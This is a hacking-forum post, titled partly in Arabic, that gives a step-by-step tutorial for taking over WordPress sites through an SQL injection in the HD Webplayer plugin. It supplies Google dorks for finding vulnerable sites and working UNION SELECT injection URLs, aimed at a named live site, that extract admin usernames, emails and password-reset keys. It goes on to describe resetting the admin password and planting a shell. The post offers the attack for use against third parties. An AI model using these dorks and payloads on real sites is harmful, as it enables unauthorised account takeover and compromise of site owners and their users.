Members Login
Username 
 
Password 
    Remember Me  
home page -> 💀 𝒸ʸ𝐛ᵉℝ-匚𝑜𝐝€R C๏𝕞𝕞𝓤nᎥᵗY💀 -> Website and Forum Hacking -> ثغرات الورد برس SQLi in plugin
Post Info TOPIC: ثغرات الورد برس SQLi in plugin
cYber-coder


Senior Member

Status: Offline
Posts: 317
Date:
ثغرات الورد برس SQLi in plugin
Permalink Closed


So lets begin.
I will use this 0day here by JoinSeventh.

First of all we need to find a vulnerable page.
We enter this in Google:

Code:
# Dork 1 (config.php)
inurl:"/wp-content/plugins/hd-webplayer/config.php?id="

# Dork 2 (playlist.php)
inurl:"/wp-content/plugins/hd-webplayer/playlist.php?videoid="

# Dork 3 (General):
inurl:"/wp-content/plugins/hd-webplayer/"


When you found your site you need to find admin email and username.
I will be using this site for example:

Code:
http://www.thefreenudecelebritysite.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=3


[Image: regiont.png]

When i add ' text disappears so it is vulnerable.

[Image: regionzn.png]

NOTE: I will not demonstrate how to SQL inject.

Now we need admin username and email.
We need to inject:

Code:
http://www.thefreenudecelebritysite.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_email,0x3b),5,6,7,8,9,10,11 FROM wp_users--


Now we have 2 users.

[Image: regionjhg.png]

We pick one and copy his email.
Go to the login page of the site.
It is usually here:

Code:
http://www.site.com/wp-login.php


And press "Lost your password?"

[Image: regionz.png]

Now you enter either username or email.
We can enter both so it doesnt matter.
I entered email.

[Image: regionby.png]
[Image: regionng.png]

Now when you got:

"Check your e-mail for the confirmation link."

It means that reset key is successfully sent.
Now we need to get the activation key.

Go back to the syntax you used for extracting email and username and do this:

Code:
http://www.thefreenudecelebritysite.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_email,0x3b),5,6,7,8,9,10,11 FROM wp_users--

 

Code:
http://www.thefreenudecelebritysite.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_activation_key,0x3b),5,6,7,8,9,10,11 FROM wp_users--


[Image: regiongn.png]

Voila!
Now we just need to reset it.

Go to:

Code:
wp-login.php?action=rp&key=resetkey&login=username


NOTE: Replace key= & login=

So my link will be:

[Image: regionzi.png]

Enter new password:

[Image: thefreenudecelebritysit.png]
[Image: regiongv.png]

Login with new password and shell it.
http://www.hackforums.net/showthread.php?tid=2405188
That's it guys.



__________________
Page 1 of 1  sorted by
 
Quick Reply

Please log in to post quick replies.
home page -> 💀 𝒸ʸ𝐛ᵉℝ-匚𝑜𝐝€R C๏𝕞𝕞𝓤nᎥᵗY💀 -> Website and Forum Hacking -> ثغرات الورد برس SQLi in plugin
Tweet this page Post to Digg Post to Del.icio.us


Create your own FREE Forum
Report Abuse 		Powered by ActiveBoard